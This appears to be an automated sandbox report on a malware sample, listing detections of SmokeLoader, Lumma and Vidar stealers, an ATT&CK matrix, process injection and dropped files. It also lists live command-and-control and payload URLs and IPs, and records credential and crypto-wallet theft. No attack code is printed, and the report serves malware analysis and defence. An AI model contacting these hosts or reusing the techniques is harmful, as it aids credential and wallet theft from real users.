                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected CryptOne packer
                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A0D60 sqlite3_bind_parameter_name,12_2_6D1A0D60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A0C40 sqlite3_bind_zeroblob,12_2_6D1A0C40
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C8EA0 sqlite3_clear_bindings,12_2_6D0C8EA0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,12_2_6D1A0B40
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C6410 bind,WSAGetLastError,12_2_6D0C6410
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0CC030 sqlite3_bind_parameter_count,12_2_6D0CC030
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0CC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,12_2_6D0CC050
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C6070 PR_Listen,12_2_6D0C6070
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C60B0 listen,WSAGetLastError,12_2_6D0C60B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C63C0 PR_Bind,12_2_6D0C63C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0522D0 sqlite3_bind_blob,12_2_6D0522D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C9400 sqlite3_bind_int64,12_2_6D0C9400

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		14
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Shared Modules                    		Boot or Logon Initialization Scripts812
                    Process Injection                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		12
                    File and Directory Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Exploitation for Client Execution                    		Logon Script (Windows)Logon Script (Windows)2
                    Software Packing                    		Security Account Manager47
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    PowerShell                    		Login HookLogin Hook1
                    DLL Side-Loading                    		NTDS1
                    Network Share Discovery                    		Distributed Component Object Model2
                    Clipboard Data                    		125
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    File Deletion                    		LSA Secrets561
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials22
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Virtualization/Sandbox Evasion                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job812
                    Process Injection                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1448044 Sample: xvJv1BpknZ.exe Startdate: 27/05/2024 Architecture: WINDOWS Score: 100 65 whispedwoodmoodsksl.shop 2->65 67 steamcommunity.com 2->67 69 2 other IPs or domains 2->69 87 Snort IDS alert for network traffic 2->87 89 Multi AV Scanner detection for domain / URL 2->89 91 Found malware configuration 2->91 93 15 other signatures 2->93 11 xvJv1BpknZ.exe 2->11         started        14 etrtabd 2->14         started        signatures3 process4 signatures5 111 Detected unpacking (changes PE section rights) 11->111 113 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->113 115 Maps a DLL or memory area into another process 11->115 117 Creates a thread in another existing process (thread injection) 11->117 16 explorer.exe 62 7 11->16 injected 119 Multi AV Scanner detection for dropped file 14->119 121 Machine Learning detection for dropped file 14->121 123 Checks if the current machine is a virtual machine (disk enumeration) 14->123 process6 dnsIp7 59 190.147.128.172, 53124, 53125, 53126 TelmexColombiaSACO Colombia 16->59 61 dbfhns.in 190.13.174.94, 49708, 49709, 49710 TelefonicadelSurSACL Chile 16->61 63 4 other IPs or domains 16->63 41 C:\Users\user\AppData\Roaming\etrtabd, PE32 16->41 dropped 43 C:\Users\user\AppData\Local\TempE6.exe, PE32 16->43 dropped 45 C:\Users\user\AppData\Local\Temp\5876.exe, PE32 16->45 dropped 47 C:\Users\user\...\etrtabd:Zone.Identifier, ASCII 16->47 dropped 79 System process connects to network (likely due to code injection or exploit) 16->79 81 Benign windows process drops PE files 16->81 83 Deletes itself after installation 16->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->85 21 EE6.exe 1 16->21         started        25 5876.exe 16->25         started        file8 signatures9 process10 dnsIp11 49 C:\Users\user\AppData\Local\...\katDDA4.tmp, PE32 21->49 dropped 95 Machine Learning detection for dropped file 21->95 97 Contains functionality to inject code into remote processes 21->97 99 Writes to foreign memory regions 21->99 107 3 other signatures 21->107 28 katDDA4.tmp 1 46 21->28         started        71 whispedwoodmoodsksl.shop 188.114.96.3, 443, 53066, 53068 CLOUDFLARENETUS European Union 25->71 73 185.235.137.54, 53078, 80 AFRARASAIR Iran (ISLAMIC Republic Of) 25->73 101 Antivirus detection for dropped file 25->101 103 Multi AV Scanner detection for dropped file 25->103 105 Detected unpacking (changes PE section rights) 25->105 109 5 other signatures 25->109 33 WerFault.exe 21 25->33         started        file12 signatures13 process14 dnsIp15 75 steamcommunity.com 104.102.42.29, 443, 53085 AKAMAI-ASUS United States 28->75 77 37.27.34.12, 443, 53087, 53088 UNINETAZ Iran (ISLAMIC Republic Of) 28->77 51 C:\Users\user\AppData\Local\...\sqls[1].dll, PE32 28->51 dropped 53 C:\Users\user\AppData\...\softokn3[1].dll, PE32 28->53 dropped 55 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 28->55 dropped 57 10 other files (6 malicious) 28->57 dropped 125 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 28->125 127 Found many strings related to Crypto-Wallets (likely being stolen) 28->127 129 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->129 131 5 other signatures 28->131 35 cmd.exe 28->35         started        file16 signatures17 process18 process19 37 conhost.exe 35->37         started        39 timeout.exe 35->39         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    xvJv1BpknZ.exe34%VirustotalBrowse
                    xvJv1BpknZ.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\5876.exe100%AviraTR/AVI.AceCrypter.javlp
                    C:\Users\user\AppData\Roaming\etrtabd100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\EE6.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\5876.exe100%Joe Sandbox ML
                    C:\ProgramData\FBGIDHCAAKEB\freebl3.dll0%ReversingLabs
                    C:\ProgramData\FBGIDHCAAKEB\mozglue.dll0%ReversingLabs
                    C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\FBGIDHCAAKEB\nss3.dll0%ReversingLabs
                    C:\ProgramData\FBGIDHCAAKEB\softokn3.dll0%ReversingLabs
                    C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\5876.exe92%ReversingLabsWin32.Spyware.Lummastealer
                    C:\Users\user\AppData\Local\Temp\katDDA4.tmp4%ReversingLabs
                    C:\Users\user\AppData\Roaming\etrtabd29%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    whispedwoodmoodsksl.shop17%VirustotalBrowse
                    steamcommunity.com0%VirustotalBrowse
                    dbfhns.in5%VirustotalBrowse
                    15.164.165.52.in-addr.arpa1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://powerpoint.office.comer0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                    https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world0%URL Reputationsafe
                    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli0%URL Reputationsafe
                    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                    https://www.youtube.com0%URL Reputationsafe
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                    https://android.notify.windows.com/iOSd0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://lv.queniujq.cn0%URL Reputationsafe
                    https://www.youtube.com/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp0%URL Reputationsafe
                    https://checkout.steampowered.com/0%URL Reputationsafe
                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT0%URL Reputationsafe
                    https://help.steampowered.com/en/0%URL Reputationsafe
                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
                    http://schemas.micro0%URL Reputationsafe
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%URL Reputationsafe
                    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%URL Reputationsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
                    whispedwoodmoodsksl.shop100%Avira URL Cloudmalware
                    https://37.27.34.12/mozglue.dll0%Avira URL Cloudsafe
                    https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI090%URL Reputationsafe
                    https://login.steampowered.com/0%URL Reputationsafe
                    https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                    https://store.steampowered.com/legal/0%URL Reputationsafe
                    https://store.steampowered.com/0%URL Reputationsafe
                    http://ns.adobeS0%URL Reputationsafe
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                    https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli0%URL Reputationsafe
                    https://api.steampowered.com/0%URL Reputationsafe
                    https://store.steampowered.com/mobile0%URL Reputationsafe
                    https://www.msn.com:443/en-us/feed0%URL Reputationsafe
                    https://37.27.34.120%Avira URL Cloudsafe
                    http://guteyr.cc/tmp/index.php100%Avira URL Cloudmalware
                    https://37.27.34.12/=0%Avira URL Cloudsafe
                    https://37.27.34.12/0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%VirustotalBrowse
                    https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                    https://s.ytimg.com;0%Avira URL Cloudsafe
                    https://t.me/copterwin0%Avira URL Cloudsafe
                    https://37.27.34.12BFBKFB0%Avira URL Cloudsafe
                    http://guteyr.cc/tmp/index.php16%VirustotalBrowse
                    https://whispedwoodmoodsksl.shop/D100%Avira URL Cloudmalware
                    whispedwoodmoodsksl.shop17%VirustotalBrowse
                    https://whispedwoodmoodsksl.shop/H100%Avira URL Cloudmalware
                    https://37.27.34.12/0%VirustotalBrowse
                    https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                    https://t.me/copterwinr0isMozilla/5.00%Avira URL Cloudsafe
                    https://37.27.34.120%VirustotalBrowse
                    https://37.27.34.12/freebl3.dllBu0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
                    https://t.me/copterwin1%VirustotalBrowse
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://t.me/copterwinr0isMozilla/5.00%VirustotalBrowse
                    http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%VirustotalBrowse
                    https://37.27.34.12/vcruntime140.dlly0%Avira URL Cloudsafe
                    http://45.129.96.86/file/update.exe100%Avira URL Cloudmalware
                    https://whispedwoodmoodsksl.shop/n100%Avira URL Cloudmalware
                    https://www.google.com/recaptcha/0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/765611996897178990%Avira URL Cloudsafe
                    https://37.27.34.12/freebl3.dll0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%Avira URL Cloudsafe
                    https://java.co0%Avira URL Cloudsafe
                    http://45.129.96.86/file/update.exe20%VirustotalBrowse
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu0%Avira URL Cloudsafe
                    https://www.google.com/recaptcha/0%VirustotalBrowse
                    https://java.co0%VirustotalBrowse
                    https://37.27.34.12/freebl3.dll0u0%Avira URL Cloudsafe
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu0%VirustotalBrowse
                    https://steamcommunity.com/workshop/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    whispedwoodmoodsksl.shop
                    		188.114.96.3
                    		truetrueunknown
                    steamcommunity.com
                    		104.102.42.29
                    		truetrueunknown
                    dbfhns.in
                    		190.13.174.94
                    		truetrueunknown
                    15.164.165.52.in-addr.arpa
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://37.27.34.12/mozglue.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    whispedwoodmoodsksl.shoptrue
                    • 17%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://guteyr.cc/tmp/index.phptrue
                    • 16%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://37.27.34.12/false
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://45.129.96.86/file/update.exetrue
                    • 20%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12/freebl3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12/nss3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12/softokn3.dllfalse
                    • Avira URL Cloud: safe
                    		unknown
                    holicisticscrarws.shoptrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtab5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://powerpoint.office.comerexplorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://37.27.34.1276561199689717899[1].htm.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.gstatic.cn/recaptcha/katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englikatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://37.27.34.12/=katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.valvesoftware.com/legal.htmkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.youtube.comkatDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://s.ytimg.com;katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://t.me/copterwinEE6.exe, 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12BFBKFBkatDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://android.notify.windows.com/iOSdexplorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://whispedwoodmoodsksl.shop/D5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742584345.0000000000818000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
